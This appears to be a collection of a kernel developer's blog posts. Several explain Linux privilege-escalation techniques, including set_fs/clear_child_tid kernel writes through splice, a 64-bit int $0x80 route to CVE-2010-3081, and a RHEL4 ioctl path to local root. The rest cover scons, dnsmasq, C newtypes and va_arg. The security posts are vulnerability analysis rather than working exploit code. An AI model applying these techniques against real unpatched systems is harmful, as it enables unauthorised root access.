After a set_fs(KERNEL_DS), no checking is performed that user pointers point to userspace – access_ok will always return true. set_fs(KERNEL_DS) is mainly used to enable the kernel to wrap functions that expect user pointers, by passing them pointers into the kernel address space. A typical use reads something like this:

old_fs = get_fs(); set_fs(KERNEL_DS);
vfs_readv(file, kernel_buffer, len, &pos);

vfs_readv expects a user-provided pointer, so without the set_fs(), the access_ok() inside vfs_readv() would fail on our kernel buffer, so we use set_fs() to effectively temporarily disable that checking.

Kernel oopses

When the kernel oopses, perhaps because of a NULL pointer dereference in kernelspace, or because of a call to the BUG() macro to indicate an assertion failure, the kernel attempts to clean up, and then tries to kill the current process by calling the do_exit() function to exit the current process.

When the kernel does so, it's still running in the same process context it was before the oops occured, including any set_fs() override, if applicable. Which means that do_exit will get called with access_ok disabled – not something anyone expected when they wrote the individual pieces of this system.


As it turns out, do_exit contains a write to a user-controlled address that expects access_ok to be working properly!

clear_child_tid is a feature where, on thread exit, the kernel can be made to write a zero into a specified address in that thread's address space, in order to notify other threads of that exit.

This is implemented by simply storing a pointer to the to-be-zeroed address inside struct task_struct (which represents a single thread or process), and, on exit, mm_release, called from do_exit, does:

put_user(0, tsk->clear_child_tid);

This is normally safe, because put_user checks that its second argument falls into the "userspace" segment before doing a write. But, if we are running with get_fs() == KERNEL_DS, it will happily accept any address at all, even one pointing into kernel space.

So, if we find any kernel BUG() or NULL dereference, or other page fault, that we can trigger after a set_fs(KERNEL_DS), we can trick the kernel into a user-controlled write into kernel memory!

splice() et. al.

An obvious question at this point is: How much of the kernel can an attacker cause to run with get_fs() == KERNEL_DS?

There are a number of small special cases. For example, the binary sysctl compatibility code works by calling the normal /proc/ write handlers from kernelspace, under set_fs(). handful of compat-mode (32 on 64) syscalls work similarly.

By far the biggest source I've found, however, is the splice() system call. The splice() system call is a relatively recent addition to Linux, and allows for zero-copy transfer of pages between a pipe and another file descriptor.

As of 2.6.31, attempts to splice() to or from an fd that doesn't support special handling to actually do zero-copy splice, will fall back on doing an ordinary read(), write(), or sendmsg() on the fd … from the kernel, using set_fs() in order to pass in kernel buffers.

What that means it that by using splice(), an attacker can call the bulk of the code in most obscure filesystems and socket types (which tend not to have explicit splice() support) with a segment override in place. Conveniently for an attacker, that is also exactly a description of where the bulk of the random security bugs tend to be.

This is also exactly the technique Dan's exploit uses. He uses CVE-2010-3849, an otherwise boring NULL pointer dereference I reported in the Econet network protocol. His exploit code does a splice() to an econet socket, causing the econet_sendsmg handler to get called under set_fs(KERNEL_DS). When it oopses, do_exit is called, and he gets a user-controlled write into kernel memory. Everything else is just details.


1 Back in Linux 1.x, this function actually set the %fs register on i386. It hasn’t in years, but it’s used in too many places for changing the name to be worth it.

Some Notes on CVE-2010-3081 Exploitability

Most of you reading this blog probably remember CVE-2010-3081. The bug got an awful lot of publicity when it was discovered an announced, due to allowing local privilege escalation against virtually all 64-bit Linux kernels in common use at the time.

While investigating CVE-2010-3081, I discovered that several of the commonly-believed facts about the CVE were wrong, and it was even more broadly exploitable than was publically documented. I'd like to share those observations here.

A brief review of the bug

The bug arose from the compat_alloc_user_space function in Linux's 32-bit compatibility support on 64-bit systems. compat_alloc_user_space allocates and returns space on the userspace kernel stack for the kernel to use:

static inline void __user *compat_alloc_user_space(long len)
    struct pt_regs *regs = task_pt_regs(current);
    return (void __user *)regs->sp - len;

This function is only called by compat-mode syscalls, so current is assumed to be a 32-bit process, in which case regs->sp, the user stack pointer, will be a 32-bit quantity. This, if we subtract a small len, the result should still fit in 32 bits, which, on a 64-bit system means it is guaranteed to fall within the user address space.

Because of this, some callers of compat_alloc_user_space were lazy, and did not call access_ok (or a function which called access_ok) to check that the result of compat_alloc_user_space fell within the user address space.

However, it turned out that some call sites in the kernel called compat_alloc_user_space with a user-controlled len value, allowing the subtraction to wrap around. On a 64-bit system, the kernel lives in the top four gigabytes of memory, and so this wraparound is enough for a user to cause compat_alloc_user_space to return a pointer into the kernel's address space.

Moreover, it turned out that the functions that used a user-controlled len also did not check access_ok on the result of the allocation. In particular, Linux 2.6.26 introduced the compat_mc_getsockopt function, which called compat_alloc_user_space with a user-controlled length and then copied user-controlled data to this pointer. It is this function which the public exploit targetted.

Disabling 32-bit binaries doesn't help

When an exploit was released for this bug, many sources circulated a mitigation: Disable 32-bit binaries on a system. Prevent compat-mode processes from running, the logic goes, and you prevent anyone from making a compat-mode syscall that triggers the vulnerable path.

This mitigation indeed prevented the public exploit from working (it included 32-bit inline assembly, and so couldn't even easily be recompiled as a 64-bit binary), and many observers seemed to believe it closed the bug entirely.

However, this was not the case! It turns out, on an amd64 system, a 64-bit process can still make a compat-mode system call using the int $0x80 instruction, which is the traditional 32-bit syscall mechanism! Even though the process is running in 64-bit mode, int $0x80 redirects to the compat-mode syscall table.

After realizing this, modifying the public exploit to work when compiled in 64-bit mode was a simple matter of porting the inline assembly, and changing a small handful of types. I've posted the modified exploit and the diff against the original for the curious.

The integer overflow is totally irrelevant

Once you've realized that you can make compat-mode system calls from a 64-bit process, a little bit of thought reveals something else interesting. compat_alloc_user_space subtracts the len value off of the userspace stack pointer. Previously, we relied on subtracting a large value from a 32-bit stack pointer in order to end up with a kernel pointer. However, while a 32-bit is limited to a 32-bit stack pointer, a 64-bit process can write a full 64-bit value into %rsp, and thus regs->sp! There's no need for underflow at all – you can just write a 64-bit value into %rsp and do an int $0x80, and make compat_alloc_user_space return any value you please!

The condition for exploitability thus drops from "user-controlled len and no access_ok" to simply "no access_ok".

This is interesting, because it turns out that some very old kernels, before 2.6.11, including RHEL 4, have the following function:

int siocdevprivate_ioctl(unsigned int fd, unsigned int cmd, unsigned long arg)
        struct ifreq __user *u_ifreq64;

        u_ifreq64 = compat_alloc_user_space(sizeof(*u_ifreq64));

        /* Don't check these user accesses, just let that get trapped
         * in the ioctl handler instead.
        copy_to_user(&u_ifreq64->ifr_ifrn.ifrn_name[0], &tmp_buf[0], IFNAMSIZ);
        __put_user(data64, &u_ifreq64->ifr_ifru.ifru_data);

        return sys_ioctl(fd, cmd, (unsigned long) u_ifreq64);

Remember, we can make compat_alloc_user_space return an arbitrary value. The copy_to_user will call access_ok and fail, but that return value will be discarded, and the __put_user will scribble 32 bits of user-controlled data at a user-controlled address. Bingo, local root.

It turns out this function was present in Linux 2.4.x, too, meaning that this exploit even affected RHEL3 and anyone else still running a 2.4-based system!

Based on this exploit, I've produced a working proof-of-concept exploit for RHEL4, based on the released exploit for RHEL5. Contact me if you're interested, but it's pretty straightforward.

Closing notes

As far as I know, neither of these facts has been publically documented prior to this post. I shared this information with Red Hat, and they requested I keep it private until they released fixes for RHEL 3, which happened last week. I would not be at all surprised to learn that someone else has private exploits that incorporate either or both of these observations, though.

One important moral here is you must be very careful when declaring a system unaffected by a vulnerability, or declaring a mitigation to be complete. Software systems have gotten tremendously complex, and it's often impossible to be totally confident you understand every last way an attacker could tickle a vulnerability.

Why Scons Is Cool

I've recently started playing with scons a little for some small personal projects. It's not perfect, but I've rapidly come to the conclusion that it's a probably far better choice than make in many cases. The main exceptions would be cases where you need to integrate into legacy build systems, or if asking or expecting developers to have scons installed is unreasonable for some reason.

The main reason that scons is cool to me, and the thing that makes it fundamentally different from make, is the introduction of actual scoping.

make has a single global scope. This is one of the main reasons that people write recursive Makefiles; By giving you one file per directory, you get one scope per directory, which makes it possible to have per-directory pattern rules, variables, and all that other stuff, without driving yourself insane.

make's awful syntax, confusing varieties of variable, whitespace-sensitivity, and all the other things that people love to bitch about are annoying, but to my mind, the single scope that makes recursive Makefiles the dominant (and, really, the only scalable) paradigm is the one thing that really sucks.

scons solves this by baking various kinds of scoping into the tool. scons lets you include sub-build-scripts (typically named SConscript, by convention). Those scripts run in their own namespace and can establish their own variables, rules, etc., but the end result is then merged back into the global rule list (handling sub-directory paths intelligently), so that the scheduler can work globally, instead of having to recurse.

Furthermore, because of this explicit scoping, you can pass variables, including targets, between build files, letting you explicitly set up cross-directory dependencies or share CFLAGS or other variables, making it easy for different directories to share exactly as much or as little configuration as you want.

In addition, scons has the concept of "build environments", which are objects that include build rules, variables, and so on. By reifying what make just represents as the global environment into objects, it makes it much easier to scope and program things. For example, if you have a set of targets that should be built using the global default rules, except with debugging enabled, you can do:

myenv = env.Clone()
myenv.Append(CFLAGS = ['-g'])

By making it (optionally) explicit which sets of rules and variables are being used in each place, it becomes much easier to share multiple kinds of targets and rule sets in a single file, without necessitating lots of sub-files just for scoping, like make tends to lead to.

scons is cool for a bunch of reasons. It eliminates most of the stupid little annoyances you've probably had with make. But, in my mind, this is the thing that makes it cool. They've added sane scoping to the build tool, so that you can construct non-recursive build systems without going insane.

I'll definitely be considering scons for any new projects I write going forward. I hate make, and this definitely feels like a path forward.

Configuring Dnsmasq With VMware Workstation

I love VMware workstation. I keep VMs around for basically every version of every major Linux distribution, and use them heavily for all kinds of kernel testing and development.

This post is a quick writeup of my networking setup with VMware Workstation, using dnsmasq to assign my VMs addresses and provide a DNS server to resolve VM addresses.

The objective

I want to be able to resolve my VM's hostnames so that I can ssh to them, or run other network services and access them from the host. I could just assign static addresses and put them in /etc/hosts, but that's totally lame, and liable to be a source of error and frustration, because I have dozens of VMs, and add and remove them frequently.

We're going to set things up so that when VMs get addresses from DHCP, their hostnames automatically become resolvable, using the .vmware domain. To do this, we're going to set up a piece of software called dnsmasq, which is a flexible DNS and DHCP server, designed for basically exactly this purpose.

The setup

Because I use my VMs for local testing, I just keep most of them on a local NAT on my machine. I configure that virtual network inside VMware as follows (run vmware-netconfig, or follow the appropriate menus):

Note how I disable "Use local DHCP service to distribute IP addresses to VMs" – we're going to set up dnsmasq to prove DHCP, so we don't want it fighting with VMware's.

Notice that the subnet I'm using here is 172.16.37.* – if you choose a different one, you'll need to adjust accordingly later.

Configuring dnsmasq

Then, I install dnsmasq, and configure /etc/dnsmasq.conf as follows:






Here's what each of those lines mean, in order:


We don't want dnsmasq serving DHCP or DNS to the outside world or other virtual networks, so we only tell it to listen on the local interface – so that we can talk to it from the host – and to the virtual network we set up in the previous step. We don't want it serving DHCP to localhost, though, so we tell it not to.


Here we tell dnsmasq how to forward DNS requests to the outside world. We're going to be using dnsmasq as our primary nameserver, and having it forward requests for things it doesn't understand to a real DNS server. In my case, that's my LAN's router, at The local line tells dnsmasq that the .vmware domain is local, and it should never forward requests to resolve things in that domain.

If I needed something more complicated, it might be possible to use the resolv-file option or similar, but I don't, personally.


These options tell dnsmasq not to look at resolv.conf or /etc/hosts when resolving names – we want it only to resolve VMs itself, and to forward everything else.


This tells dnsmasq to assign the .vmware domain to hosts it hands out DHCP to, so that we can resolve VMs in the .vmware domain.


And finally, we configure the DHCP server. We give it a range of addresses to assign on the subnet we created earlier. I stop at .200, so that I can leave the last few open for static IPs if I need for some reason, and we start at .3.1 is the host, and .2 is the address of VMware's router. dhcp-authoritative enables some optimizations when dnsmasq knows it is the only DHCP server around.


Finally, we need dhcp-option to tell DHCP clients to use the VMware-provided router at .2 as their gateway, instead of using the host, at .1. We could configure the host to be a NAT server using Linux's NAT, but that's outside the scope of this document.

Configuring the host

Now, we need to configure the host to use dnsmasq as our DNS server. This is a simple matter of telling the host to use as our DNS server, and to add .vmware to our search path. If we're editing resolv.conf directly, it would look like:

search vmware

Configuring guests

We need to configure our guests to send a hostname along with their DHCP requests, so that dnsmasq can add them to its address table. How to do this varies by OS, but most modern OSes do it automatically. If they don't, here are a few hints:

For RHEL-based distros, edit /etc/sysconfig/network-scripts/ifcfg-INTERFACE, and add a line like


For most other Linux distributions, you can often edit dhclient.conf (usually in /etc/ or /etc/dhclient/) to include:

 send host-name "centos-5-amd64";

Or, with a recent dhclient,

 send host-name "<hostname>";

will make it look up the machine's actual hostname.


That's all there is to it. This is a pretty simple setup, but hopefully someone else will find this useful. If you need dnsmasq to do something more subtle, the documentation is mostly quite good.

Using Haskell’s ‘Newtype’ in C

A common problem in software engineering is avoiding confusion and errors when dealing with multiple types of data that share the same representation. Classic examples include differentiating between measurements stored in different units, distinguishing between a string of HTML and a string of plain text (one of these needs to be encoded before it can safely be included in a web page!), or keeping track of pointers to physical memory or virtual memory when writing the lower layers of an operating system's memory management.

Unless we're using a richly-typed language like Haskell, where we can use newtype, the best solutions tend to just rely on convention. The much-maligned Hungarian Notiation evolved in part to try to combat this sort of problem – If you decide on a convention that variables representing physical addresses start with pa and virtual addresses start with va, then anyone who encounters a uintptr_t pa_bootstack; can immediately decode the intent.

It turns out, though, that we can get something very much like newtype in familiar old C. Suppose we're writing some of the paging code for a toy x86 architecture. We're going to be passing around a lot of physical and virtual addresses, as well as indexes of pages in RAM, and it's going to be easy to confuse them all. The traditional solution is to use some typedefs, and then promise to be very careful to mix them up:

typedef uint32_t physaddr_t;
typedef uint32_t virtaddr_t;
typedef uint32_t ppn_t;

We have to promise not to mess up, though – the compiler isn't going to notice if I pass a ppn_t to a function that wanted a physaddr_t.

This example was inspired by JOS, a toy operating system used by MIT's Operating Systems Engineering class. JOS remaps all of physical memory starting at a specific virtual memory address (KERNBASE), and so provides the following macros:

/* This macro takes a kernel virtual address -- an address that points above
 * KERNBASE, where the machine's maximum 256MB of physical memory is mapped --
 * and returns the corresponding physical address.  It panics if you pass it a
 * non-kernel virtual address.
#define PADDR(kva)                                          \
({                                                          \
        physaddr_t __m_kva = (physaddr_t) (kva);            \
        if (__m_kva < KERNBASE)                                     \
                panic("PADDR called with invalid kva %08lx", __m_kva);\
        __m_kva - KERNBASE;                                 \

/* This macro takes a physical address and returns the corresponding kernel
 * virtual address.  It panics if you pass an invalid physical address. */
#define KADDR(pa)                                           \
({                                                          \
        physaddr_t __m_pa = (pa);                           \
        uint32_t __m_ppn = PPN(__m_pa);                             \
        if (__m_ppn >= npage)                                       \
                panic("KADDR called with invalid pa %08lx", __m_pa);\
        (void*) (__m_pa + KERNBASE);                                \

Because the typedefs are unchecked by the compiler, though, it is a common mistake to use a physical address where a virtual address is meant, and nothing will catch it until your kernel triple-faults, and a long, painful debugging session ensues.

Inspired by Haskell's newtype, though, it turns out we can get the compiler to check it for us, with a little more work, by using a singleton struct instead of a typedef:

typedef struct { uint32_t val; } physaddr_t;

If we wanted to be overly cute, we could even use a macro to mimic Haskell's newtype:

#define NEWTYPE(tag, repr)                  \
    typedef struct { repr val; } tag;       \
    static inline tag make_##tag(repr v) {  \
            return (tag){.val = v};         \
    }                                       \
    static inline repr tag##_val(tag v) {   \
            return v.val;                   \

NEWTYPE(physaddr, uint32_t);
NEWTYPE(virtaddr, uint32_t);
NEWTYPE(ppn,  uint32_t);

Given those definitions, PADDR and KADDR become:

#define PADDR(kva)                                          \
({                                                          \
    if (virtaddr_val(kva) < KERNBASE)                       \
            panic("PADDR called with invalid kva %08lx", virtaddr_val(kva)); \
    make_physaddr(virtaddr_val(kva) - KERNBASE);            \

#define KADDR(pa)                                           \
({                                                          \
    uint32_t __m_ppn = physaddr_val(pa) >> PTXSHIFT;        \
    if (__m_ppn >= npage)                                   \
            panic("KADDR called with invalid pa %08lx", physaddr_val(pa)); \
    make_virtaddr(physaddr_val(pa) + KERNBASE);             \

We have to use some accessor and constructor functions, but in exchange, we get strong type-checking: If you pass PADDR a physical address (or anything other than a virtual address), the compiler will catch it.

The wrapping and unwrapping is slightly annoying, but we can for the most part avoid having to do it everywhere, by pushing the wrapping and unwrapping down into some utility functions. For instance, a relatively common operation at this point in JOS is creating a page-table entry, given a physical address. If you want to construct the PTE by hand, you need to use physaddr_val every time. But a better plan is a simple utility function:

 static inline pte_t make_pte(physaddr addr, int perms) {
     return physaddr_val(addr) | perms;

In addition to losing the need to unwrap the physaddr everywhere, we gain a measure of clarity and typechecking – if you remember to use make_pte, you'll never accidentally try to insert a virtual address into a page table.

We can add similar functions for converting between types, as well a a struct Page, used to track metadata for a physical page. As an experiment, I went and reimplemented JOS's memory management primitives using these definitions, and only needed to use FOO_val or make_FOO a very few times outside of the header files that defined KADDR and friends.


While the typechecking is nice, any C programmer implementing a memory-management system is probably going to want to know: How much does it cost me? You're creating and unpacking these singleton structs everywhere – does that have a cost?

The answer, though, in almost all cases is "no" – A half-decent compiler will optimize the resulting code to be completely identical to the code without the structs, in almost all cases.

Also, the in-memory representation of the struct is going to be exactly the same as the bare value – it's even guaranteed to have the same alignment and padding constraints, so if you need to embed a physaddr inside another struct, or into an array, the representation is identical to the physaddr_t typedef.

On i386, parameters are passed on the stack, so that means that passing the struct is identical to passing the uint32_t. On amd64, as described last week, small structures are passed in registers, and so, again, the calling convention is identical.

Unfortunately, the i386 ABI specifies that returned structs always go on the stack (while integers go in %eax), so you do pay slightly if you want to return one of these typedef'd objects. amd64 will also break it down into a register, though, so on a 64-bit machine it's again identical.

If you're worried, though, you can always use the preprocessor to make the checks vanish for a production build:

#ifdef NDEBUG
#define NEWTYPE(tag, repr)                  \
    typedef repr tag;                       \
    static inline tag make_##tag(repr v) {  \
            return v;                       \
    }                                       \
    static inline repr tag##_val(tag v) {   \
            return v;                       \
/* Same definition as above */

Because the types have identical representations, you can safely serialize your structs and exchange them between code compiled with either version. On amd64, you can probably even call between compilation units defined either way.

The next time you're writing some subtle C code that has to deal with multiple types with the same representation, I encourage you to consider using this trick.


I didn't invent this trick, although as far as I know the NEWTYPE macro is my own invention (Edited to add: A commenter points out that I'm not the first to use the newtype name in C, although I think I prefer my implementation).

. I learned this trick from the Linux kernel, which uses it for a very similar application – distinguishing entries in different levels of the x86 page tables. page.h on amd64 includes following definitions [Taken from an old version, but the current version has equivalent ones):

 * These are used to make use of C type-checking..
typedef struct { unsigned long pte; } pte_t;
typedef struct { unsigned long pmd; } pmd_t;
typedef struct { unsigned long pud; } pud_t;
typedef struct { unsigned long pgd; } pgd_t;

I claimed above that the struct and the bare type will have the same alignment and padding. I don't believe this is guaranteed by C99, but the SysV amd64 and i386 ABI specifications both require:

Structures and unions assume the alignment of their most strictly aligned component. Each member is assigned to the lowest available offset with the appropriate alignment. The size of any object is always a multiple of the object’s alignment.

(text quoted from the amd64 document, but the i386 one is almost identical).

And C99 requires (§ para 13):

… A pointer to a structure object, suitably converted, points to its initial member (or if that member is a bit-field, then to the unit in which it resides), and vice versa. There may be unnamed padding within a structure object, but not at its beginning.

I believe these requirements, taken together, should be enough to ensure that the struct and the bare type will have the same representation.

Amd64 and Va_arg

A while back, I was poking around LLVM bugs, and discovered, to my surprise, that LLVM doesn't support the va_arg intrinsic, used by functions to accept multiple arguments, at all on amd64. It turns out that clang and llvm-gcc, the compilers that backend to LLVM, have their own implementations in the frontend, so this isn't as big a deal as it might sound, but it was still a surprise to me.

Figuring that this might just be something no one got around to, and couldn't actually be that hard, I pulled out my copy of the amd64 ABI specification, figuring that maybe I could throw together a patch and fix this issue.

Maybe half an hour of reading later, I stopped in terror and gave up, repenting of my foolish ways to go work on something else. va_arg on amd64 is a hairy, hairy beast, and probably not something I was going to hack together in an evening. And so instead I decided to blog about it.

The problem: Argument passing on amd64

On i386, because of the dearth of general-purpose registers, the calling convention passes all arguments on the stack. This makes the va_arg implementation easy – A va_list is simply a pointer into the stack, and va_arg just adds the size of the type to be retrieved to the va_list, and returns the old value. In fact, the i386 ABI reference simply specifies va_arg in terms of a single line of code:

#define va_arg(list, mode) ((mode *)(list = (char *)list + sizeof(mode)))[-1]

On amd64, the problem is much more complicated. To start, amd64 specifies that up to 6 integer arguments and up to 8 floating-point arguments are passed to functions in registers, to take advantage of amd64's larger number of registers. So, for a start, va_arg will have to deal with the fact that some arguments may have been passed in registers, and some on the stack.

(One could imagine simplifying the problem by stipulating a different calling convention for variadic functions, but unfortunately, for historical reasons and otherwise, C requires that code be able to call functions even if their prototype is not visible, which means the compiler doesn't necessarily know if it's calling a variadic function at any given call site. [edited to add: caf points out in the comments that C99 actually explicitly does not require this property. But I speculate that the ABI designers wanted to preserve this property from i386 because it has historically worked, and so existing code depended on it]).

That's not all, however. Not only can integer arguments be passed by registers, but small structs (16 bytes or fewer) can also be passed in registers. A sufficiently small struct, for the purposes of the calling convention, is essentially broken up into its component members, which are passed as though they were separate arguments – unless only some of them would fit into registers, in which case the whole struct is passed on the stack.

So va_arg, given a struct as an argument, has to be able to figure out whether it was passed in registers or on the stack, and possibly even re-assemble it into temporary space.

The implementation

Given all those constraints, the required implementation is fairly straightforward, but incredibly complex compared to any other platform I know of.

To start, any function that is known to use va_start is required to, at the start of the function, save all registers that may have been used to pass arguments onto the stack, into the "register save area", for future access by va_start and va_arg. This is an obvious step, and I believe pretty standard on any platform with a register calling convention. The registers are saved as integer registers followed by floating point registers. As an optimization, during a function call, %rax is required to hold the number of SSE registers used to hold arguments, to allow a varargs caller to avoid touching the FPU at all if there are no floating point arguments.

va_list, instead of being a pointer, is a structure that keeps track of four different things:

typedef struct {
  unsigned int gp_offset;
  unsigned int fp_offset;
  void *overflow_arg_area;
  void *reg_save_area;
} va_list[1];

reg_save_area points at the base of the register save area initialized at the start of the function. fp_offset and gp_offset are offsets into that register save area, indicating the next unused floating point and general-purpose register, respectively. Finally, overflow_arg_area points at the next stack-passed argument to the function, for arguments that didn't fit into registers.

Here's an ASCII art diagram of the stack frame during the execution of a varargs function, after the register save area has been established. Note that the spec allows functions to put the register save area anywhere in its frame it wants, so I've shown potential storage both above and below it.

|     ...        |  [high addresses]
|   argument     |
|    passed      |
|  on stack (2)  |
+----------------+  <---- overflow_arg_area
|   argument     |
|    passed      |
|  on stack (1)  |
| return address |
|      ...       | (possible local storage for func)
|     %xmm15     | \
+----------------+  |     
|     %xmm14     |  |     ___
+----------------+  |      |
|      ...       |   \ register
+----------------+    }save|
|     %xmm0      |   / area|
+----------------+  |      |
|      %r9       |  |      |
+----------------+  |      | fp_offset
|      %r8       |  |  ___ |
+----------------+  |   |  |
|      ...       |  |   |  |
+----------------+  |   | gp_offset
|     %rsi       |  |   |  |
+----------------+  |   |  |
|     %rdi       | /    |  |
+----------------+ <----+--+--- reg_save_area
|     ...        | (potentially more storage)
+----------------+ <----------- %esp
|     ...        | [low addresses]

Because va_arg must tell determine whether the requested type was passed in registers, it needs compiler support, and can't be implemented as a simple macro like on i386. The amd64 ABI reference specifies va_arg using a list of eleven different steps that the macro must perform. I'll try to summarize them here.

First off, va_arg determines whether the requested type could be passed in registers. If not, va_arg behaves much like it does on i386, using the overflow_arg_area member of the va_list (Plus some complexity to deal with alignment values).

Next, assuming the argument can be passed in registers, va_arg determines how many floating-point and general-purpose registers would be used to pass the requested type. It compares those values with the gp_offset and fp_offset fields in the va_list. If the additional registers would cause either value to overflow the number of registers used for parameter-passing for that type, then the argument was passed on the stack, and va_arg bails out and uses overflow_arg_area.

If we've made it this far, the argument was passed in registers. va_arg fetches the argument using reg_save_area and the appropriate offsets, and then updates gp_offset and fp_offset as appropriate.

Note that if the argument was passed in a mix of floating-point and general-purpose registers, or requires a large alignment, this means that va_arg must copy it out of the register save area onto temporary space in order to assemble the value.

So, in the worst case, va_arg on a type that embeds both a floating-point and an integer type must do two comparisons, a conditional branch, and then update two fields in the va_list and copy multiple values out of the register save area into a temporary object to return. That's quite a lot more work than the i386 version does. Note that I don't mean to suggest this is a performance concern – I don't have any benchmarks to back this up, but I would be shocked if this is measurable in any reasonable code. But I was surprised by how complex this operation is.

A Brief Look at Linux’s Security Record

After the fuss of the last two weeks because of CVE-2010-3081 and CVE-2010-3301, I decided to take a look at a handful of the high-profile privilege escalation vulnerabilities in Linux from the last few years.

So, here’s a summary of the ones I picked out. There are also a large number of smaller ones, like an AF\_CAN exploit, or the l2cap overflow in the Bluetooth subsystem, that didn’t get as much publicity, because they were found more quickly or didn’t affect as many default configurations.

CVE nameNicknameintroducedfixednotes
CVE-2007-4573ptrace2.4.x2.6.22.764-bit only
CVE-2008-0009vmsplice (1)
CVE-2008-0600vmsplice (2)
CVE-2009-2692sock\_sendpage2.4.x2.6.31mmap\_min\_addr helped 1
CVE-2010-3301ptrace (redux) only

I’ll probably have some more to say about these bugs in the future, but here’s a few thoughts:

  • At least two of these bugs existed since the 2.4 days. So no matter what kernel you’ve been running, you had privilege escalation bugs you didn’t know about for as long as you were running that kernel. We don’t know whether or not the blackhats knew about them, but are you feeling lucky?
  • I bet there are at least a few more privesc bugs dating back to 2.4 we haven’t found yet.
  • If you run a Linux machine with untrusted local users, or with services that are at risk of being compromised (e.g. your favorite shitty PHP webapp), you’d better have a story for how you’re dealing with these bugs. Including the fact that some of these were privately known for years before they were announced.
  • It’s not clear from this sample that the kernel is getting more secure over time. I suspect we’re getting better at finding bugs, particularly now that companies like Google are paying researchers to audit the kernel, but it’s not obvious we’re getting better at not introducing them in the first place. Certainly CVE-2010-3301 is pretty embarrassing, being a reintroduction of a bug that had been fixed seven months previously.


1 mmap_min_addr mitigated this bug to a DoS, but several bugs that allowed attackers to get around that restriction were announced at the same time.

2 The public exploit relies on a call path introduced in 2.6.26, but observers have pointed out the possibility of exploit vectors affecting older kernels.